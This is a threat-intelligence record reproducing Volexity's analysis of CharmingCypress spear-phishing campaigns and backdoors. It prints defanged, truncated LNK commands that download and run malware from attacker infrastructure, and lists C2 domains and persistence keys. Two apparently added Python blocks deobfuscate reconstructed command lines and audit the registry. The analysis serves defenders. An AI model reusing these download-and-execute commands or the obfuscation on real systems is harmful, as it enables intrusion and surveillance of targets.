{
	"id": "71efa982-8f1f-4453-9240-187e5d0c727e",
	"created_at": "2026-04-06T00:09:07.504099Z",
	"updated_at": "2026-04-10T03:36:00.85479Z",
	"deleted_at": null,
	"sha1_hash": "982bf37657869a231fdb77ab613b2a3807389950",
	"title": "CharmingCypress: Innovating Persistence",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4006986,
	"plain_text": "CharmingCypress: Innovating Persistence\r\nBy mindgrub\r\nPublished: 2024-02-13 · Archived: 2026-04-05 18:38:36 UTC\r\nThrough its managed security services offerings, Volexity routinely identifies spear-phishing campaigns targeting\r\nits customers. One persistent threat actor, whose campaigns Volexity frequently observes, is the Iranian-origin\r\nthreat actor CharmingCypress (aka Charming Kitten, APT42, TA453). Volexity assesses that CharmingCypress is\r\ntasked with collecting political intelligence against foreign targets, particularly focusing on think tanks, NGOs,\r\nand journalists.\r\nIn their phishing campaigns, CharmingCypress often employs unusual social-engineering tactics, such as\r\nengaging targets in prolonged conversations over email before sending links to malicious content. In a particularly\r\nnotable spear-phishing campaign observed by Volexity, CharmingCypress went so far as to craft an entirely fake\r\nwebinar platform to use as part of the lure. CharmingCypress controlled access to this platform, requiring targets\r\nto install malware-laden VPN applications prior to granting access.\r\nNote: Some content in this blog was recently discussed in Microsoft’s report, New TTPs observed in Mint\r\nSandstorm campaign targeting high-profile individuals at universities and research orgs.\r\nMalware Families Associated with CharmingCypress\r\nThis blog post serves as a public reference regarding tools Volexity has observed in use by CharmingCypress\r\nthroughout 2023 and into early 2024 including details on techniques the threat actor has used to distribute them.\r\nThe following malware families are discussed in this post:\r\nhttps://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/\r\nPage 1 of 17\n\nPOWERSTAR\r\nPOWERLESS\r\nNOKNOK\r\nBASICSTAR\r\nEYEGLASS\r\nIn June 2023, Volexity published a post about POWERSTAR. 
And while CharmingCypress has previously\r\ndistributed POWERSTAR (aka GorjolEcho) and NOKNOK within the same campaign, the use of POWERLESS\r\nin a recently identified campaign is a new observation. Furthermore, BASICSTAR appears to be a new Visual\r\nBasic malware that has limited functional overlap with POWERSTAR.\r\nMalware Distribution Techniques\r\nSpear Phishing\r\nThroughout 2023, Volexity observed a wide range of spear-phishing activity conducted by CharmingCypress. This\r\nactivity included spoofing individuals from different organizations, including the use of personas tied to media\r\norganizations and research institutions. In September and October 2023, CharmingCypress engaged in a series of\r\nspear-phishing attacks in which they masqueraded as the Rasanah International Institute for Iranian Studies (IIIS).\r\nCharmingCypress registered multiple, typo-squatted domains for use in these attacks that are similar to the\r\norganization’s actual domain, rasanah-iiis[.]org.\r\nThe image below shows an example of a spear phish sent by CharmingCypress, in which the threat actor\r\ncontacted a policy expert pretending to be an employee of the Rasanah Institute. 
The email invites the target to\r\njoin a fake webinar.\r\nThis email demonstrates the following features:\r\nAn attempt to engage the target in a conversation, rather than immediately prompting them to open a\r\nmalicious link or download malware\r\nImpersonation of a real organization likely to be known by the target in order to construct a viable reason\r\nfor the contact\r\nThe use of WhatsApp and Signal phone numbers, which are controlled by CharmingCypress and are\r\noffered as alternative methods of contacting the threat actor\r\nOther spear-phish attempts by CharmingCypress in 2023 have involved one or more of the following:\r\nURLs that start a redirection chain, culminating in the download of a RAR archive containing malicious\r\nshortcut (LNK) files\r\nUse of compromised webmail accounts belonging to real contacts of the target\r\nUse of multiple threat-actor controlled email accounts within the same phishing chain (which Proofpoint\r\npreviously described as Multi-Persona Impersonation)\r\nRAR + LNK Combo\r\nIn 2023, CharmingCypress often used RAR archives containing LNK files to deliver malware during spear-phishing campaigns. The infection chain from a recent campaign conducted by CharmingCypress is shown below.\r\nAfter initial contact with the target was established and matured, an OnRender URL (hxxps://cloud-document-edit.onrender[.]com/page/jujbMKB[snipped]TpCNvV) was shared with the target. This URL redirected to a\r\npassword-protected RAR file hosted on Supabase\r\n(hxxps://wulpfsrqupnuqorhexiw.supabase[.]co/storage/v1/object/public/StarPj/Items%20Shared.rar). 
The\r\npassword for this RAR was shared in a subsequent email.\r\nThe RAR file contained two LNK files:\r\nName(s) The global consequences of the Israel-Hamas war – Shortcut.lnk\r\nSize 1.9KB (1945 Bytes)\r\nFile Type LNK\r\nMD5 3fbf3ce1a9b452421970810bd6b6b37a\r\nSHA1 729346dfdd2203a9943119bac03419d63554c4b8\r\nName(s) US strategy in the Middle East is coming into focus – Shortcut.lnk\r\nSize 2.3KB (2371 Bytes)\r\nFile Type LNK\r\nMD5 78e4975dc56e62226f4c56850efb452b\r\nSHA1 1f974d7634103536e524a41a79046785ca7ae3d6\r\nThe names of these files were copied from recent articles published by the Atlantic Council in order to appeal to the\r\nvictim. Each LNK has its own unique infection workflow. However, both will ultimately open a remotely-hosted\r\ndecoy document and download a malware component. Both LNK files use cmd.exe string replacement (junk characters inserted into the command and stripped again at execution time) to\r\nobfuscate commands.\r\nThe following defanged command (shown truncated), embedded in The global consequences of the Israel-Hamas war -\r\nShortcut.lnk, downloads and executes BASICSTAR, which is discussed in further detail later in this blog post.\r\n/c set c=cu7rl --s7sl-no-rev7oke -s -d \"id=VzXdED\u0026Prog=2_Mal_vbs.txt\u0026WH=The-global-.pdf\" -X PO7ST hxx\r\nThe following defanged command (shown truncated), embedded in US strategy in the Middle East is coming into focus -\r\nShortcut.lnk, downloads and executes KORKULOADER.\r\n/c set fg=powershetsrll.exe -w 1 \"$y=(wgetsrt -Urtsri httsrtps://wulpfsrqupnuqorhexiw.supabase[.]co/s\r\nKORKULOADER is a very simple PowerShell downloader script; the additional payloads it was meant to retrieve could not be obtained at the time of investigation.\r\nThis infection chain was partially discussed in this recent Microsoft blog post.\r\nMalware-laden VPN Applications\r\nAnother recent CharmingCypress spear-phishing campaign built on a technique reported by Proofpoint\r\nin July 2023, using a malware-laden VPN application to 
deploy malware. A high-level overview of the overall\r\ninfection chain is shown below.\r\nEmails containing a link to a fake webinar platform, and credentials to enable access to it, were distributed to a\r\nsmall number of targeted individuals. The platform was hosted on the following subdomains:\r\nrasaaneh-iiis[.]org\r\nrasaanah-iiis[.]org\r\nVolexity identified emails sent using the following domains, which all mimic the legitimate rasanah-iiis[.]org\r\ndomain:\r\nrasaneh-iiis[.]org\r\nrasaanah-iiis[.]org\r\nrasaaneh-iiis[.]org\r\nWhen users attempted to access the portal, it would check the supplied credentials. If the credentials were correct,\r\nit would then check the IP address used to access the portal. Only users running the attacker’s VPN client would\r\nsuccessfully authenticate. If the IP address check failed, targets were prompted to download a VPN application, as\r\nshown below.\r\nDepending on the user’s operating system (determined via the user-agent used to request the page), different\r\napplications would be served to the user. The served application was a functional VPN client bundled with\r\nmalware. Windows victims would be served an infection chain culminating in POWERLESS, while macOS\r\nvictims would be served an infection chain culminating in NOKNOK.\r\nThe Windows VPN application shown below establishes a connection to a CharmingCypress-controlled VPN\r\nendpoint using the supplied credentials and an OpenVPN configuration file.\r\nWhen connected to this VPN, outbound network requests to the portal are routed through the VPN server. 
The\r\nmacOS version achieves a similar routing effect using the Apple utility networksetup to set a SOCKS\r\nproxy on the Wi-Fi network service via the following command:\r\nnetworksetup -setsocksfirewallproxy wi-fi $serveradd $portnum\r\nThese proxy parameters are parsed from an OVPN configuration file that contains a legitimate OpenVPN\r\nconfiguration with additional non-standard fields containing data used by the client. The VPN server used was\r\nhosted at 49.13.15[.]66 on UDP port 1194.\r\nAttempting to log on to the portal while connected to the VPN successfully passes the IP address check and allows\r\naccess to the fake webinar portal.\r\nFake Webinar Portal\r\nInspecting the fake webinar portal shows the threat actor invested a significant level of effort. The portal includes\r\nthe logo of the impersonated organization within a full web portal interface that includes a series of tabs.\r\nWithin the portal, profiles of 16 individuals were populated and associated with a specific webinar. Volexity\r\nreverse engineered the malware-laden VPN application and identified 16 sets of MD5-hashed credentials with\r\nusernames. When these credentials were cracked, they yielded plaintext usernames associated with individuals that\r\nVolexity assesses with high confidence were targets of this campaign. All 16 individuals are experts in policy\r\nregarding the Middle East.\r\nBackdoors\r\nPOWERLESS\r\nThe backdoor deployed by the Windows variant of the malware-laden VPN application infection chain is called\r\nPOWERLESS. Previous reporting by Check Point on POWERLESS has linked the tool to EDUCATED\r\nMANTICORE, a group Check Point assesses is “Iranian-aligned” and has “strong overlap with Phosphorous” (aka\r\nCharmingCypress). 
POWERLESS is a PowerShell backdoor that contains a broad feature set including the\r\nfollowing:\r\nAES-encrypted command-and-control (C2) communication using a key passed down from the server\r\nDownload of additional executables for audio recording, browser information stealing, persistence, and\r\nkeylogging\r\nUpload/download of files\r\nExecution of files\r\nExecution of shell commands\r\nScreenshot capture\r\nTelegram information theft\r\nUpdate configuration of POWERLESS in memory, including modification of C2 address\r\nThese functions are largely the same as previously described by Check Point; however, the infection chain is\r\nslightly different. The malware-laden VPN application writes a malicious binary, VPN.exe (file details below), to\r\nthe default OpenVPN directory and executes it. VPN.exe handles authentication via the supplied credentials and\r\nconnection to the VPN.\r\nName(s) VPN.exe\r\nSize 1.2MB (1250816 Bytes)\r\nFile Type application/x-dosexec\r\nMD5 266305f34477b679e171375e12e6880f\r\nSHA1 607137996a8dc4d449185586ecfbe886e120e6b1\r\nVPN.exe also downloads a base64-encoded blob of data from the C2, writes this to disk at C:\\Users\\Public\\vconf, and\r\ndownloads a .NET binary named cfmon.exe (file details below). Persistence for cfmon.exe is achieved by adding\r\na Shell value under the registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon (see T1547.004 for more information on this technique).\r\nName(s) cfmon.exe\r\nSize 119.0KB (121856 Bytes)\r\nFile Type application/x-dosexec\r\nMD5 859a9e523c3308c120e82068829fab84\r\nSHA1 5bdec05bdca8176ae67054a3a7dc8c5ef0ac8deb\r\nWhen executed, cfmon.exe first patches the AmsiScanBuffer and EtwEventWrite API functions to bypass\r\nthem, replacing the initial function bytes. 
It then decrypts the AES-encrypted file vconf, retrieved by the previous\r\nbinary, yielding an obfuscated PowerShell script. This PowerShell script is executed in memory. After\r\ndeobfuscating this script, Volexity identified it as a new version of the POWERLESS malware. Details of the\r\nanalyzed POWERLESS sample are below.\r\nName(s) N/A\r\nSize 235.0KB (240620 Bytes)\r\nFile Type text/plain\r\nMD5 c3fe93fc9133c0bc4b441798b9bcf151\r\nSHA1 87f36a0279b31a4a2f9b1123674e3dea130f1554\r\nThe C2 address used by this sample of POWERLESS is defaultbluemarker[.]info. The following domains\r\ncould be trivially linked to this domain via shared TLS certificates and/or hosting infrastructure:\r\nyellowparallelworld.ddns[.]net\r\nbeginningofgraylife.ddns[.]net\r\nVolexity was able to obtain the three additional modules used by POWERLESS, which are further described\r\nbelow.\r\nBrowser Information Stealer\r\nA browser information stealer module named blacksmith.exe can steal passwords, cookies and browser history.\r\nName(s) blacksmith.exe\r\nSize 1.6MB (1651200 Bytes)\r\nFile Type application/x-dosexec\r\nMD5 9b6c308f106e72394a89fac083de9934\r\nSHA1 27b38cf6667936c74ed758434196d2ac9d14deae\r\nPersistence\r\nA persistence module downloads an executable, oqeifvb.exe, from the C2, writes this to\r\n$env:windir\\Temp\\p\\, and executes this via the Start-Process cmdlet. This module also passes the CLSID of the COM handler\r\nused by the legitimate scheduled task MsCtfMonitor to oqeifvb.exe. POWERLESS then maintains persistence by\r\nadding the HKCU\\Environment\\UserInitMprLogonScript registry entry with a value of oqeifvb.exe.\r\nThe purpose of oqeifvb.exe is to download another file, msedg.dll, and establish persistence for that file by\r\nhijacking the COM handler for the MsCtfMonitor scheduled task using the CLSID retrieved earlier. 
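The three persistence locations named in this section (a per-user Winlogon Shell value, HKCU\\Environment\\UserInitMprLogonScript, and a per-user InprocServer32 registration for the CLSID that the MsCtfMonitor task's COM handler resolves) can be audited together. The Python below is an added example written for this page, not code from the Volexity post. It runs over a constructed registry snapshot shaped like a reg export; the CLSID, the cfmon.exe and msedg.dll paths and the Shell value data in that snapshot are placeholders (the post does not give them), while the oqeifvb.exe path follows the post. The collect_live_values helper reads the same values through winreg on Windows; the CLSID to pass it is the ComHandler ClassId in the task XML under System32\\Tasks\\Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor, which this example does not parse.

```python
import sys

# Value paths below the hive, lower-cased, backslash-separated.
WINLOGON_SHELL = 'software\\microsoft\\windows nt\\currentversion\\winlogon\\shell'
LOGON_SCRIPT = 'environment\\userinitmprlogonscript'


def _norm(path):
    p = path.lower().replace('hkey_current_user', 'hkcu').replace('hkey_local_machine', 'hklm')
    return p.strip('\\')


def audit_persistence(reg, com_clsids=()):
    """reg maps value paths (e.g. 'HKCU\\Environment\\UserInitMprLogonScript') to
    their data, the shape a reg export or a triage collector gives you.
    com_clsids lists the COM handler CLSIDs of scheduled tasks to check."""
    vals = {_norm(k): v for k, v in reg.items()}
    findings = []

    def hit(technique, what, path, data):
        findings.append({'technique': technique, 'what': what, 'path': path, 'data': data})

    # T1547.004: Winlogon Shell. Windows never sets a per-user override, and the
    # machine value should be exactly explorer.exe (a missing value means default).
    shell = vals.get('hkcu\\' + WINLOGON_SHELL)
    if shell is not None:
        hit('T1547.004', 'per-user Winlogon Shell override', 'HKCU\\' + WINLOGON_SHELL, shell)
    shell = vals.get('hklm\\' + WINLOGON_SHELL, 'explorer.exe')
    if shell.strip().lower() != 'explorer.exe':
        hit('T1547.004', 'machine Winlogon Shell is not explorer.exe', 'HKLM\\' + WINLOGON_SHELL, shell)

    # T1037.001: UserInitMprLogonScript runs at logon and is normally absent.
    script = vals.get('hkcu\\' + LOGON_SCRIPT)
    if script is not None:
        hit('T1037.001', 'UserInitMprLogonScript set', 'HKCU\\' + LOGON_SCRIPT, script)

    # T1546.015: HKCU\Software\Classes is merged into HKCR ahead of HKLM, so a
    # per-user InprocServer32 for a CLSID the task handler resolves wins the lookup.
    for clsid in com_clsids:
        path = 'hkcu\\software\\classes\\clsid\\' + clsid.lower() + '\\inprocserver32\\(default)'
        dll = vals.get(path)
        if dll is not None:
            hit('T1546.015', 'per-user COM handler for ' + clsid, path, dll)
    return findings


def collect_live_values(com_clsids=()):
    """Windows only: read the same values through winreg into the reg shape above."""
    if sys.platform != 'win32':
        raise RuntimeError('live collection requires Windows')
    import winreg
    wanted = [
        (winreg.HKEY_LOCAL_MACHINE, 'HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'Shell'),
        (winreg.HKEY_CURRENT_USER, 'HKCU', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'Shell'),
        (winreg.HKEY_CURRENT_USER, 'HKCU', 'Environment', 'UserInitMprLogonScript'),
    ]
    for clsid in com_clsids:
        wanted.append((winreg.HKEY_CURRENT_USER, 'HKCU',
                       'Software\\Classes\\CLSID\\' + clsid + '\\InprocServer32', ''))
    reg = {}
    for hive, tag, subkey, name in wanted:
        try:
            with winreg.OpenKey(hive, subkey) as key:
                data, _ = winreg.QueryValueEx(key, name)   # '' reads the (Default) value
        except OSError:
            continue                                       # key or value absent: nothing to report
        reg[tag + '\\' + subkey + '\\' + (name or '(Default)')] = data
    return reg


# Constructed snapshot, not data from the Volexity report: the CLSID and the
# cfmon.exe / msedg.dll paths are placeholders; oqeifvb.exe's path follows the post.
SAMPLE_TASK_CLSID = '{01234567-89AB-CDEF-0123-456789ABCDEF}'
SAMPLE_REG = {
    'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell': 'explorer.exe',
    'HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell': 'explorer.exe,C:\\Users\\Public\\cfmon.exe',
    'HKCU\\Environment\\UserInitMprLogonScript': 'C:\\Windows\\Temp\\p\\oqeifvb.exe',
    'HKCU\\Software\\Classes\\CLSID\\' + SAMPLE_TASK_CLSID + '\\InprocServer32\\(Default)': 'C:\\Users\\Public\\msedg.dll',
}

if __name__ == '__main__':
    for finding in audit_persistence(SAMPLE_REG, [SAMPLE_TASK_CLSID]):
        print(finding['technique'], finding['what'], '->', finding['data'])
```

Each finding carries the MITRE technique ID (T1547.004, T1037.001 and T1546.015) so the output maps straight onto a detection rule or a triage note. The COM check is the one most worth generalising: any scheduled task whose action is a ComHandler can be hijacked the same way, so in practice the CLSID list comes from enumerating the Tasks folder rather than from one known task.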
Volexity was\r\nnot able to obtain the additional DLL and therefore assesses CharmingCypress likely limits deployment of this\r\nadditional stage to victims who have been manually approved to receive it.\r\nName(s) oqeifvb.exe\r\nSize 448.5KB (459264 Bytes)\r\nFile Type application/x-dosexec\r\nMD5 c79d85d0b9175cb86ce032543fe6b0d5\r\nSHA1 195e939e0ae70453c0817ebca8049e51bbd4a825\r\nAudio Recorder\r\nAn audio recorder module named AudioRecorder4.exe simply captures audio using the Windows API.\r\nName(s) AudioRecorder4.exe\r\nSize 344.5KB (352768 Bytes)\r\nFile Type application/x-dosexec\r\nMD5 5fc8668f9c516c2b08f34675380e2a57\r\nSHA1 c3fd8ed68c0ad2a97d76fc4430447581414e7a7e\r\nNOKNOK\r\nThe backdoor deployed by the macOS version of the malware-laden VPN application infection chain is called\r\nNOKNOK. NOKNOK is downloaded by the VPN application and executed in memory. The download mechanism is\r\nidentical to that described by Proofpoint in their recent report. For example, the download URL for this bash script\r\nshares the same /DMPR/[alphanumeric string] format.\r\nCharmingCypress delivers NOKNOK as a string that has been base64 encoded five times. The resulting script is\r\nthe same as the previous version of the NOKNOK malware described by Proofpoint. The C2 used by this sample\r\nof NOKNOK is decorous-super-blender[.]glitch[.]me.\r\nBASICSTAR\r\nThe backdoor deployed by the RAR + LNK infection chain is a previously undocumented backdoor that Volexity\r\ntracks as BASICSTAR. Details of the analyzed sample are below.\r\nName(s) down.vbs\r\nSize 13.3KB (13652 Bytes)\r\nFile Type application/octet-stream\r\nMD5 2edea0927601ef443fc31f9e9f8e7a77\r\nSHA1 cdce8a3e723c376fc87be4d769d37092e6591972\r\nBASICSTAR has the following functionality:\r\nCollect the computer name, username and operating system from the compromised device. 
This information is\r\nreversed and base64 encoded before being passed to the C2 server.\r\nDownload a lure PDF from the C2 and open it.\r\nDownload the NirCmd command-line interface for execution of subsequent commands.\r\nEnter a command loop, passing the collected information to the C2 and inspecting the returned result for a\r\ncommand.\r\nExecute commands via the NirCmd command-line interface.\r\nRemotely execute commands relayed from the C2 (see table below).\r\nCommand: Function\r\nkill: Delete update.vbs, a.vbs, and a.ps1, and then exit.\r\nSetNewConfig: Set a new sleep timer for the command loop.\r\nModule: Use ModuleTitle, ModuleName and Parameters to download a file, and execute this\r\nvia NirCmd.\r\nVolexity was not able to obtain the additional modules used by BASICSTAR. Interestingly, the cleanup command\r\n(kill) deletes three files that were not observed by Volexity (update.vbs, a.vbs, and a.ps1). These are\r\nlikely Visual Basic and PowerShell scripts downloaded in subsequent components of the attack. This capability is\r\nin line with the same command in the POWERSTAR malware family.\r\nInformations.vbs\r\nThe latest version of BASICSTAR observed by Volexity involved a Visual Basic script named\r\nInformations.vbs (see below).\r\nName(s) Informations.vbs\r\nSize 21.6KB (22134 Bytes)\r\nFile Type unknown\r\nMD5 853687659483d215309941dae391a68f\r\nSHA1 25005352eff725afc93214cac14f0aa8e58ca409\r\nVolexity assesses with high confidence that this script is a BASICSTAR module with an internal name of\r\nInformations (sic). 
This module uses a variety of WMI queries to gather an extensive set of information about\r\nthe compromised machine, including the following:\r\nInstalled antivirus products\r\nInstalled software\r\nInformation regarding the machine BIOS, hardware, manufacturer details, and disks\r\nNetwork adapters and configurations\r\nThe BASICSTAR sample involved in this infection chain was configured to use the Glitch domain prism-west-candy[.]glitch[.]me as a C2.\r\nPost-exploitation Activity \u0026 Investigation with Volexity Volcano\r\nIn one incident response case, Volexity gained some rare insight into additional tools CharmingCypress deploys if\r\nthey successfully compromise a device. Volexity used Volexity Volcano to analyze memory from the compromised\r\nendpoint. Although the endpoint was protected by a popular endpoint detection and response (EDR) solution, Volcano quickly\r\nshowed several obvious signs of compromise.\r\nOne of Volcano’s automated IOCs (“Bad Powershell”) triggered on a script extracted from event logs. The log\r\ncontains references to some of the remote systems contacted by the script, including supabase[.]co.\r\nFurthermore, it identifies the PID of the powershell.exe process (13524) that executed this script, as shown\r\nbelow.\r\nThis powershell.exe instance was still running, with its parent tree intact. Components of the LNK payload that\r\ndownloads BASICSTAR stood out in the command-line arguments, as shown below.\r\nThe process tree shows the interesting effect of string substitution. 
Both conhost.exe and cmd.exe contain\r\nobfuscated content, but the decoded arguments to powershell.exe were preserved in memory:\r\npowershell -w 1 $pnt=(Get-Content\" -Path C:\\Users\\\u003credacted\u003e\\AppData\\Roaming\\Microsoft\\documentLoge\r\nArmed with knowledge of the documentLoger.txt path, Volexity reconstructed the entire contents from the\r\nsystem’s file cache, as shown below.\r\nAnother Volcano IOC (“Shortcut Execution”) brought attention to one of the LNK files, Draft-LSE.pdf.lnk,\r\nused in this attack. As shown below, this uses the icon from Microsoft Edge to trick end users.\r\nSearching memory for the source of the LNK revealed an archive file named Draft-LSE (3).rar in the user’s\r\nDownloads folder, along with a valuable set of timestamps to triage the activity, although the (3) in the file\r\nname suggests this was not the first time the user downloaded this file. 
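The string substitution seen in that process tree is cmd.exe's %VAR:search=replace% expansion: the LNK embeds a command with junk characters inserted (cu7rl and powershetsrll.exe in the RAR + LNK section above), assigns it to a variable with set, and relies on a second expansion pass to strip the junk before the real curl or powershell.exe command runs. As an added example for this page, not code from the Volexity post, the Python below emulates that expansion so the two LNK command lines decode offline, and exposes the %VAR:junk=% pattern as a detection feature for process command-line telemetry. The sample command lines are reconstructed: the blog's listings are cut short, so the URL tails (example.invalid) and the trailing call %c:7=% and call %fg:tsr=% segments are assumptions; call is needed because cmd.exe expands %VAR% only once per line, so a set and a use of the same variable on one line require that second pass.

```python
import re

# cmd.exe expansion forms handled here: %NAME:search=replace% and plain %NAME%
_SUBST = re.compile('%([A-Za-z0-9_]+):([^%=]+)=([^%]*)%')
_PLAIN = re.compile('%([A-Za-z0-9_]+)%')
_SET = re.compile('set +([A-Za-z0-9_]+)=(.*)$', re.IGNORECASE)


def split_cmd(cmdline):
    """Split on & / && outside double quotes, the way cmd.exe separates commands."""
    segments, current, in_quotes, i = [], [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '\"':
            in_quotes = not in_quotes
        if ch == '&' and not in_quotes:
            segments.append(''.join(current).strip())
            current = []
            if i + 1 < len(cmdline) and cmdline[i + 1] == '&':
                i += 1          # treat && as a single separator
        else:
            current.append(ch)
        i += 1
    segments.append(''.join(current).strip())
    return [s for s in segments if s]


def expand(text, env):
    """Apply %VAR:search=replace% and then %VAR% using the variables set so far.
    Unknown variables are left untouched, as cmd.exe does."""
    def subst(m):
        value = env.get(m.group(1).lower())
        return m.group(0) if value is None else value.replace(m.group(2), m.group(3))

    def plain(m):
        value = env.get(m.group(1).lower())
        return m.group(0) if value is None else value

    return _PLAIN.sub(plain, _SUBST.sub(subst, text))


def deobfuscate(cmdline):
    """Return the commands that actually run for a set/expand chain such as an LNK's
    cmd.exe arguments (a leading /c and a call prefix are stripped)."""
    env, commands = {}, []
    for seg in split_cmd(cmdline):
        if seg.lower().startswith('/c '):
            seg = seg[3:].lstrip()
        m = _SET.match(seg)
        if m:
            env[m.group(1).lower()] = m.group(2)   # variable names are case-insensitive
            continue
        if seg.lower().startswith('call '):
            seg = seg[5:].lstrip()
        commands.append(expand(seg, env))
    return commands


def strip_patterns(cmdline):
    """Detection helper: (variable, junk) pairs for every %VAR:junk=% with an empty
    replacement, the signature of this obfuscation in process command lines."""
    return [(m.group(1), m.group(2)) for m in _SUBST.finditer(cmdline) if m.group(3) == '']


# Reconstructed samples (the URL tails and the call segments are assumed, see above).
SAMPLE_LNK1 = ('/c set c=cu7rl --s7sl-no-rev7oke -s -d \"id=VzXdED&Prog=2_Mal_vbs.txt&WH=The-global-.pdf\"'
               ' -X PO7ST hxxp://example.invalid/dl && call %c:7=%')
SAMPLE_LNK2 = ('/c set fg=powershetsrll.exe -w 1 \"$y=(wgetsrt -Urtsri httsrtps://example.invalid/s)\"'
               ' && call %fg:tsr=%')

if __name__ == '__main__':
    for sample in (SAMPLE_LNK1, SAMPLE_LNK2):
        print(strip_patterns(sample), deobfuscate(sample))
```

On an endpoint the same two functions can be run over the CommandLine field of Sysmon event ID 1 or Windows 4688 records: a line where strip_patterns returns a pair whose junk string also occurs inside the preceding set value is worth a look, since legitimate scripts rarely strip an arbitrary token out of the command they are about to run.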
In the Zone.Identifier alternate data stream (an MFT-resident $DATA attribute), the ZoneTransfer record showed where the file originated, as shown below.\r\nAfter just a few minutes of reviewing Volcano’s IOC hits and searching for related artifacts in both memory and\r\nfiles collected by Volexity Surge Collect Pro, Volexity analysts had nailed down the following evidence:\r\nThe initial infection vector and the website from where it was downloaded\r\nHow it persisted on the endpoint\r\nThe list of C2 hostnames\r\nTimestamps when the activity took place\r\nMany other IOCs to triage\r\nWorking folders used by the attacker on the compromised machine\r\nAdditional Tools Used by CharmingCypress\r\nIn the same investigation, Volexity identified additional tools used by CharmingCypress to facilitate data theft:\r\nNirsoft Chrome History Viewer\r\nRATHOLE\r\nSNAILPROXY\r\nCommandCam\r\nCommand-line copies of WinRAR and 7-Zip\r\nVolexity also identified a copy of EYEGLASS, the malware documented in a recent Microsoft post under the\r\nMediaPl backdoor section. In the case investigated by Volexity, EYEGLASS had been set up as the default\r\nhandler for the TIF file extension. Encountering TIF files as part of the targeted user’s day-to-day work would be\r\nunusual, and it is unlikely the attacker would want to randomly display a TIF on an already-infected device. Based\r\non available evidence, Volexity assesses with high confidence that EYEGLASS was intended only as a backup C2\r\nmechanism. 
In this scenario, if CharmingCypress lost access to the victim machine, they would try sending the\r\nuser a specially crafted TIF file in order to regain access to the device if the user opened the file.\r\nConclusion\r\nThis blog post describes targeted campaigns that reveal a high level of effort CharmingCypress is willing to\r\ndedicate to support their spear-phishing operations. This threat actor is highly committed to conducting\r\nsurveillance on their targets in order to determine how best to manipulate them and deploy malware. Additionally,\r\nfew other threat actors have consistently churned out as many campaigns as CharmingCypress, dedicating human\r\noperators to support their ongoing efforts.\r\nFor those targeted by CharmingCypress, such as journalists, activists, academics, and policy experts, it is crucial\r\nto understand that CharmingCypress is persistent. This threat actor is willing to modify their techniques on a\r\nregular basis in order to maximize their chances of compromising specific targets.\r\nFor threat intelligence readers, this blog post firmly links NOKNOK and POWERLESS to recent\r\nCharmingCypress spear-phishing activity and adds documentation regarding the BASICSTAR backdoor. This\r\ncluster has previously used the POWERSTAR malware family during similar operations.\r\nRelated indicators to detect and investigate these attacks can also be downloaded from the Volexity GitHub page:\r\nYARA rules\r\nSingle value indicators\r\nVolexity’s Threat Intelligence research, such as the content from this blog, is published to customers via\r\nits Threat Intelligence Service. 
The activity described in this blog post was shared with Volexity Threat\r\nIntelligence customers throughout 2023 and in January 2024.\r\nIf you are interested in learning more about Volexity’s services or leading memory forensics\r\nsolutions, Volexity Surge Collect Pro for memory acquisition and Volexity Volcano for memory\r\nanalysis, please do not hesitate to contact us.\r\nSource: https://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/"
	],
	"report_names": [
		"charmingcypress-innovating-persistence"
	],
	"threat_actors": [
		{
			"id": "82b92285-4588-48c9-8578-bb39f903cf62",
			"created_at": "2022-10-25T15:50:23.850506Z",
			"updated_at": "2026-04-10T02:00:05.418577Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"Charming Kitten"
			],
			"source_name": "MITRE:Charming Kitten",
			"tools": [
				"DownPaper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d8af157e-741b-4933-bb4a-b78490951d97",
			"created_at": "2023-01-06T13:46:38.748929Z",
			"updated_at": "2026-04-10T02:00:03.087356Z",
			"deleted_at": null,
			"main_name": "APT35",
			"aliases": [
				"COBALT MIRAGE",
				"Agent Serpens",
				"Newscaster Team",
				"Magic Hound",
				"G0059",
				"Phosphorus",
				"Mint Sandstorm",
				"TunnelVision"
			],
			"source_name": "MISPGALAXY:APT35",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d0e8337e-16a7-48f2-90cf-8fd09a7198d1",
			"created_at": "2023-03-04T02:01:54.091301Z",
			"updated_at": "2026-04-10T02:00:03.356317Z",
			"deleted_at": null,
			"main_name": "APT42",
			"aliases": [
				"UNC788",
				"CALANQUE"
			],
			"source_name": "MISPGALAXY:APT42",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ae26d287-8ba7-447e-9391-cf13c02d7481",
			"created_at": "2023-03-04T02:01:54.0962Z",
			"updated_at": "2026-04-10T02:00:03.357189Z",
			"deleted_at": null,
			"main_name": "TA453",
			"aliases": [],
			"source_name": "MISPGALAXY:TA453",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "029625d2-9734-44f9-9e10-b894b4f57f08",
			"created_at": "2023-01-06T13:46:38.364105Z",
			"updated_at": "2026-04-10T02:00:02.944092Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"iKittens",
				"Group 83",
				"NewsBeef",
				"G0058",
				"CharmingCypress",
				"Mint Sandstorm",
				"Parastoo"
			],
			"source_name": "MISPGALAXY:Charming Kitten",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4",
			"created_at": "2022-10-25T15:50:23.808974Z",
			"updated_at": "2026-04-10T02:00:05.291959Z",
			"deleted_at": null,
